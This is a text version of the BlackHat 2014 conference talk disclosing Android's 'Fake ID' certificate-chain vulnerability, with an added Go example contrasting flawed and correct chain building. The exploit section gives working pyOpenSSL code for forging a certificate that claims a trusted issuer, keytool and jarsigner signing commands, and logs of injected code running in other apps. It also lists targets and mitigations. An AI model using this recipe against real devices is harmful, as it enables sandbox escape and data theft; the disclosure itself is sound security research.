
Android Fake ID Vulnerability
Jeff Forristal / Bluebox
BlackHat US 2014
BLACKHAT 2014 FORRISTAL ANDROID FAKE ID
Jeff Forristal, CTO of Bluebox Security

Discovered Android Masterkey vulnerability in 2013

Contributing to the security industry for 15+ years
bug# 13678484
It is a:
Sandbox escape
usable by malware
Capable of accessing data, web traffic of other apps
Can access NFC hardware while being used by Google Wallet
Worst case: full system compromise
All by presenting a fake identification to an app
A.k.a. the Fake ID vulnerability
Application Identities / Signatures
Signatures
Android applications are signed
The signature is the base of multiple security features
Signature Hierarchy (diagram)
APK (Application): Assets, Manifest, Classes.dex, Resources, XML
Manifest (*.MF): file: hash, file: hash, ... (one line per file)
Signatures (*.SF): file: hash, file: hash, ... (one line per file)
PKCS7 Object: Opaque Signature (0101010101010...) and Public Certificate (Subject: devel, Issuer: devel, Public key: 1010101010101...)
Envelope / Certificate / Signature
PKI Certificates (diagram)
Subject: www.bluebox.com
-- BEGIN PRIVATE KEY ---
...
-- BEGIN PUBLIC KEY ---
...
PKI Certificates (diagram, two identities)
Subject: www.bluebox.com
-- BEGIN PRIVATE KEY ---
...
-- BEGIN PUBLIC KEY ---
...
Subject: Verisign CA
-- BEGIN PRIVATE KEY ---
...
-- BEGIN PUBLIC KEY ---
...
PKI Issuing (diagram)
Subject: www.bluebox.com
Issuer: Verisign CA
Issuer Signature: crypto
-- BEGIN PUBLIC KEY ---
...
-- BEGIN PRIVATE KEY ---
...
Subject: Verisign CA
-- BEGIN PRIVATE KEY ---
...
-- BEGIN PUBLIC KEY ---
...
(arrow: the Verisign CA private key produces the issuer signature on the bluebox certificate)
PKI Verification (diagram)
Subject: www.bluebox.com
Issuer: Verisign CA
Issuer Signature: crypto
-- BEGIN PUBLIC KEY ---
...
-- BEGIN PRIVATE KEY ---
...
Subject: Verisign CA
-- BEGIN PRIVATE KEY ---
...
-- BEGIN PUBLIC KEY ---
...
(arrow: the Verisign CA public key checks the issuer signature on the bluebox certificate)
PKI Self-Signed (diagram)
Subject: www.bluebox.com
Issuer: Verisign CA
Issuer Signature: crypto
-- BEGIN PUBLIC KEY ---
...
-- BEGIN PRIVATE KEY ---
...
Subject: Verisign CA
Issuer: Verisign CA
Issuer Signature: crypto
-- BEGIN PRIVATE KEY ---
...
-- BEGIN PUBLIC KEY ---
...
(the CA certificate is signed with its own private key)
PKI Chaining (diagram)
Subject: client | Issuer Signature | Issuer: SubCA1 | Public key   <- immediate identity / signer
Subject: SubCA1 | Issuer Signature | Issuer: SubCA2 | Public key
Subject: SubCA2 | Issuer Signature | Issuer: CA     | Public key
Subject: CA     | Issuer Signature | Issuer: CA     | Public key   <- trusted root certificate
Vulnerability Mechanics
Trust Checking
Applications attempt to verify the signing of other applications:

PackageInfo pkgInfo = pkgmgr.getPackageInfo( pkg, GET_SIGNATURES );
// every certificate in the APK's signing chain lands in this array
Signature[] signatures = pkgInfo.signatures;

for ( Signature sig : signatures ) {
    if ( sig.equals( TRUSTED_SIGNATURE ) ) {
        // trusted signature found, trust the application
    }
}
Opportunity
The logic accepts a trusted certificate anywhere in the signature / certificate chain
Chain Construction
1. Verify signature with signer cert

2. Create a chain based on valid signer cert

3. Get the cert's issuer

4. Find an included cert where included cert subject == previous cert's issuer

5. Add that cert to the chain
PKI Chaining - Android (diagram)
Subject: client | Issuer Signature | Issuer: SubCA1 | Public key
    ? ? ?  (link not checked)
Subject: SubCA1 | Issuer Signature | Issuer: SubCA2 | Public key
    ? ? ?  (link not checked)
Subject: SubCA2 | Issuer Signature | Issuer: CA     | Public key
    ? ? ?  (link not checked)
Subject: CA     | Issuer Signature | Issuer: CA     | Public key
A certificate can claim to be issued by any other certificate, and that claim is not verified.
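The point of the last two slides, as an added example that is not Bluebox's code nor Android's own implementation: a constructed self-signed trusted_cert, a constructed certificate that merely names trusted_cert as its issuer while carrying a signature made with an unrelated key, and the chain-construction steps above run twice over them, once matching issuer and subject names only (the behaviour the slides describe) and once also requiring the candidate issuer's public key to verify the current certificate's signature. Go's standard library stands in for the pyOpenSSL and Java code on the page; the names trusted_cert and arbitrary, the serial numbers, the 2048-bit demo keys and the function names are assumptions made for the example.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

func mustKey() *rsa.PrivateKey { // throwaway demo key, constructed for the example
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	return k
}

// CA-capable template so CheckSignatureFrom is willing to treat it as an issuer.
func newTemplate(cn string, serial int64) *x509.Certificate {
	return &x509.Certificate{
		SerialNumber:          big.NewInt(serial),
		Subject:               pkix.Name{CommonName: cn},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
	}
}

// makeCert signs tmpl with priv, copying parent.Subject into the Issuer field, then parses it.
func makeCert(tmpl, parent *x509.Certificate, pub *rsa.PublicKey, priv *rsa.PrivateKey) *x509.Certificate {
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, priv)
	if err != nil {
		panic(err)
	}
	c, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return c
}

// BuildDemoCerts returns (trusted, fake), both constructed here. The fake cert names
// trusted_cert as issuer (the parent passed in carries only that name and no public key)
// while its signature is made with an unrelated key, so the issuer claim is unbacked.
func BuildDemoCerts() (trusted, fake *x509.Certificate) {
	trustedKey, attackerKey := mustKey(), mustKey()
	tmpl := newTemplate("trusted_cert", 1)
	trusted = makeCert(tmpl, tmpl, &trustedKey.PublicKey, trustedKey)
	claimedParent := &x509.Certificate{Subject: trusted.Subject}
	fake = makeCert(newTemplate("arbitrary", 2), claimedParent, &attackerKey.PublicKey, attackerKey)
	return trusted, fake
}

// buildChain follows the slides' steps: find an included cert whose subject equals
// the current cert's issuer and append it. verify=false is a name match only (the
// behaviour described on the slides); verify=true also requires the candidate's key
// to verify the current cert's signature, which is the check that was missing.
func buildChain(leaf *x509.Certificate, pool []*x509.Certificate, verify bool) ([]*x509.Certificate, error) {
	chain := []*x509.Certificate{leaf}
	cur := leaf
	for len(chain) <= len(pool) { // bounded so a cycle in the names cannot spin forever
		if cur.Subject.String() == cur.Issuer.String() {
			break // self-signed: top of the chain
		}
		var next *x509.Certificate
		for _, c := range pool {
			if c.Subject.String() != cur.Issuer.String() {
				continue
			}
			if verify {
				if err := cur.CheckSignatureFrom(c); err != nil {
					return nil, fmt.Errorf("%q claims issuer %q but the signature does not verify: %w", cur.Subject.CommonName, c.Subject.CommonName, err)
				}
			}
			next = c
			break
		}
		if next == nil {
			break // no included cert matches the issuer name; the chain ends here
		}
		chain = append(chain, next)
		cur = next
	}
	return chain, nil
}

// Demo reports whether the name-only chain satisfies the app-side trust loop from
// the slides, and the error the verifying builder returns for the same input.
func Demo() (acceptedByNameOnly bool, verifiedErr error) {
	trusted, fake := BuildDemoCerts()
	pool := []*x509.Certificate{fake, trusted} // what the signer bundles into the PKCS7 envelope
	byName, _ := buildChain(fake, pool, false)
	for _, c := range byName { // any cert anywhere in the chain equal to the trusted one is enough
		acceptedByNameOnly = acceptedByNameOnly || c.Equal(trusted)
	}
	_, verifiedErr = buildChain(fake, pool, true)
	return acceptedByNameOnly, verifiedErr
}
```

Demo() returns true for the name-only chain (trusted_cert is reached and the `sig.equals(TRUSTED_SIGNATURE)` style loop would accept the package) and a non-nil error from the verifying builder, because CheckSignatureFrom finds that trusted_cert's public key does not verify the fake certificate's signature. The only difference between the two paths is that one CheckSignatureFrom call per link.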
This code can now be easily attacked / bypassed:

PackageInfo pkgInfo = pkgmgr.getPackageInfo( pkg, GET_SIGNATURES );
Signature[] signatures = pkgInfo.signatures;

for ( Signature sig : signatures ) {
    // passes as soon as any certificate in the chain matches, including one that
    // merely named the trusted certificate as its issuer
    if ( sig.equals( TRUSTED_SIGNATURE ) ) {
        // trusted signature found, trust the application
    }
}

Impact
Exploitation
Targets
Review all uses of signatures in AOSP

Further review of select third-party components involving extra privileges
Targets - Examples
Webview plugin manager (all AOSP <= 4.3): plugins signed by Adobe (Flash) reloaded into any/all apps using framework webview
NFC access.xml (all AOSP): match a package signature wildcard (Google Wallet), get access to NFC secure element

3LM device management extensions (assorted devices): former Google/Motorola technology, included with older devices
LG MDM device extensions (LG devices): system functions available to apps signed by LG platform signature

Exploit Creation
1. Create APK with exploit payload suitable for target

2. Isolate trusted certificate

3. Generate a new certificate

4. Set issuer to trusted certificate

5. Package all of it (new cert + target cert as a CA cert) into a PKCS12 file

6. Use the PKCS12 for exploit APK signing

(diagram)
Subject: trusted_cert | Issuer Signature          | Issuer: trusted_cert | Public key
Subject: arbitrary    | Issuer Signature (broken) | Issuer: trusted_cert | Public key

import OpenSSL.crypto   # pyOpenSSL; `target` holds the PEM text of the trusted certificate

targetcert = OpenSSL.crypto.load_certificate( OpenSSL.crypto.FILETYPE_PEM, target )
pk = OpenSSL.crypto.PKey()
pk.generate_key( OpenSSL.crypto.TYPE_RSA, 1024 )
newcert = OpenSSL.crypto.X509()
newcert.get_subject().CN = "arbitrary"
newcert.set_issuer( targetcert.get_subject() )   # the claim nothing verifies
newcert.set_pubkey( pk )
newcert.sign( pk, "sha1" )                        # signed with the new key, not the issuer's
pkcs12 = OpenSSL.crypto.PKCS12()
pkcs12.set_privatekey( pk )
pkcs12.set_certificate( newcert )
pkcs12.set_ca_certificates( [targetcert] )        # trusted cert rides along as a "CA" cert
finalPkcs12Data = pkcs12.export( passphrase="1234" )

BONUS: Exploit Creation
An APK supports being signed by multiple independent signers
You can repeat signing with as many trusted certificates as you care to include
Thus one exploit can carry exploits for multiple targets at the same time
Crafting
jeff$ openssl x509 -in webkit_plugin.pem -noout -text | grep Subject:
        Subject: C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, OU=...

jeff$ python newcert.py webkit_plugin.pem

jeff$ openssl x509 -in out.cert -noout -text
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 976234562 (0x3a302842)
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, OU=...
        Validity
            Not Before: Jun 30 23:44:40 2014 GMT
            Not After : Jun 23 23:44:40 2034 GMT
        Subject: CN=labs.bluebox.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                    00:b4:df:2d:33:9a:f2:8f:61:99:bc:36:19:37:76:
                    ...
Crafting
jeff$ keytool -v -importkeystore -srckeystore out.pkcs12 -srcstoretype PKCS12 \
    -destkeystore evil.keystore -deststoretype JKS

Enter destination keystore password:
Re-enter new password:
Enter source keystore password:
Entry for alias 1 successfully imported.
Import command completed: 1 entries successfully imported, 0 entries failed or cancelled
[Storing evil.keystore]

Crafting
jeff$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore evil.keystore \
    Bluebox_SampleWebkitPlugin.apk 1

Enter Passphrase for keystore:
Enter key password for 1:
   adding: META-INF/MANIFEST.MF
   adding: META-INF/1.SF
   adding: META-INF/1.RSA
  signing: AndroidManifest.xml
  signing: classes.dex
  signing: lib/armeabi-v7a/libsampleplugin3.so
  signing: res/drawable-mdpi/ic_launcher.png
  signing: res/drawable-mdpi/sample_browser_plugin.png
  signing: res/layout/activity_main.xml
  signing: res/menu/main.xml
  signing: resources.arsc
Fingers Crossed
jeff$ adb install Bluebox_SampleWebkitPlugin.apk
1163 KB/s (39864 bytes in 0.033s)
        pkg: /data/local/tmp/Bluebox_SampleWebkitPlugin.apk
Success

I/PackageManager(  433): Running dexopt on: com.bluebox.labs.chainbreak.demo
D/dalvikvm(11123): DexOpt: load 23ms, verify+opt 6ms, 282884 bytes
I/ActivityManager(  433): Force stopping package com.bluebox.labs.chainbreak.demo appid=10083 user=-1
W/PackageManager(  433): Unknown permission android.webkit.permission.PLUGIN in package com.bluebox.labs.chainbreak.demo
I/Plugin  ( 8109): Bluebox running code in this process!
I/Plugin  ( 8109): -- uid=10077, pid=8109, process=com.microsoft.skydrive
I/Plugin  ( 3138): Bluebox running code in this process!
I/Plugin  ( 3138): -- uid=10034, pid=3138, process=com.google.android.googlequicksearchbox:search
I/Plugin  (10166): Bluebox running code in this process!
I/Plugin  (10166): -- uid=10081, pid=10166, process=com.salesforce.chatter

Live Demo
Mitigation
Patches
Patched, sent to OHA partners; get your OTAs in the usual manner (if ever)
BTW, released to public repo May 21st
Bluebox Security Scanner (free)
Hygiene
Stick to known sources for your applications

Android 4.4 (KitKat) + is immune to the Flash webkit plugin
(KitKat replaced the webkit webview with chromium)

Check your (older) device for 3LM extensions
(adb shell getprop | grep ro.3lm.production)

Beware of who asks for Device Admin access
(Settings -> Security -> Device Administrators)
Afterthought
Thanks
jeff@bluebox.com
http://bluebox.com/blog
